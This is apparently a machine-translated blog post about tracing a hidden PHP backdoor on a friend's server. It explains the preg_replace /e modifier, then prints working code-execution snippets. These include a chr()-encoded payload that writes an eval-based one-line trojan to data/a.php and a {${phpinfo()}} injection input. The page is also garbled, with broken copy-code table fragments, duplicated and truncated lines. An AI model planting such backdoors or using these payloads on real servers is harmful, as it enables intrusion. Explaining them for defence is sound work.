There are many PHP backdoors, and I have seen and played with Baozi a lot, but when I helped a friend check the server, I found such malicious code.
The thing is like this, using various backdoor search tools on my friend’s website, no PHP Trojan was found. I can’t always find it. Xiao Hei’s tricks are very advanced. Every time I use them
After using it, I always delete the backdoor, but I can still come in every time, but I can’t find where it came in. This is really painful.
Later, I finally found some clues in the logs. Through my analysis, I found that an IP always posted strange data to a certain file. Then a paragraph
After a while, this IP accessed an inexplicable file with a very conspicuous name. It was obviously not a normal system file, but a PHP backdoor. But soon after using the backdoor
was deleted.
Haha, Xiao Hei is very attentive when I meet him.
Then through analysis, it was found that the file discovery code accessed by Xiaohei:
The code is as follows | Copy code | ||||
|
No anti-virus software can detect it.
preg_replace function prototype:
mixed preg_replace (mixed pattern, mixed replacement, mixed subject [, int limit])
Special instructions:
The
/e modifier causes preg_replace() to treat the replacement argument as PHP code (after appropriate backreferences have been replaced). Tip: Make surereplacement forms a valid PHP code string, otherwise PHP will report a syntax parsing error on the line containing preg_replace()
Wrong.
The above code is for POST to accept data and needs to be tested, which is more troublesome. If it is replaced by GET to obtain data. . .
Example:
代码如下 | 复制代码 |
echo preg_replace("/test/e",$_GET["h"],"jutst test"); |
The code is as follows | Copy code |
echo preg_replace("/test/e",$_GET["h"],"jutst test"); |
If we submit ?h=phpinfo(), phpinfo() will be executed (using the /e modifier, preg_replace will treat the replacement parameter as PHP
Code execution).
代码如下 | 复制代码 |
(110).chr(40).chr(39).chr(100).chr(97).chr(116).chr(97).chr(47).chr(97).chr(46).chr(112).chr(104).chr (112).chr(39).chr(44).chr(39).chr(119).chr(39).chr(41).chr(44).chr(39).chr(60).chr(63).chr(112).chr (104).chr(112).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr (83).chr(84).chr(91).chr(99).chr(109).chr(100).chr(93).chr(41).chr(63).chr(62).chr(39).chr(41).chr(59)) |
The code is as follows | Copy code | ||||
?h=eval(chr(102).chr(112).chr(117).chr(116).chr(115).chr(40).chr(102).chr(111).chr(112). chr(101).chr
|
The code is as follows | Copy code |
fputs(fopen(data/a.php,w),); |
The execution result is to generate a one-sentence Trojan file a.php in the /data/ directory.
This is terrifying. . . .
Another difficult example:
View code printing?
The code is as follows
|
Copy code
|
||||
function test($str) { } echo preg_replace("/s*[php](.+?)[/php]s*/ies", 'test("1")', $_GET["h"]); ?>
Submit ?h=[php]phpinfo()[/php], will phpinfo() be executed? Definitely not. Because after regular matching, the replacement parameter becomes 'test("phpinfo")', and phpinfo is only used as a string parameter at this time Counted. Is there any way to make it execute? Of course. If we submit ?h=[php]{${phpinfo()}}[/php] here, phpinfo() will be executed. Why?
In PHP, if there is a variable in double quotes, the PHP interpreter will replace it with the result of variable interpretation; variables in single quotes will not be processed. | Note: Functions enclosed in double quotes will not be executed and replaced.
(${phpinfo()} will be interpreted and executed).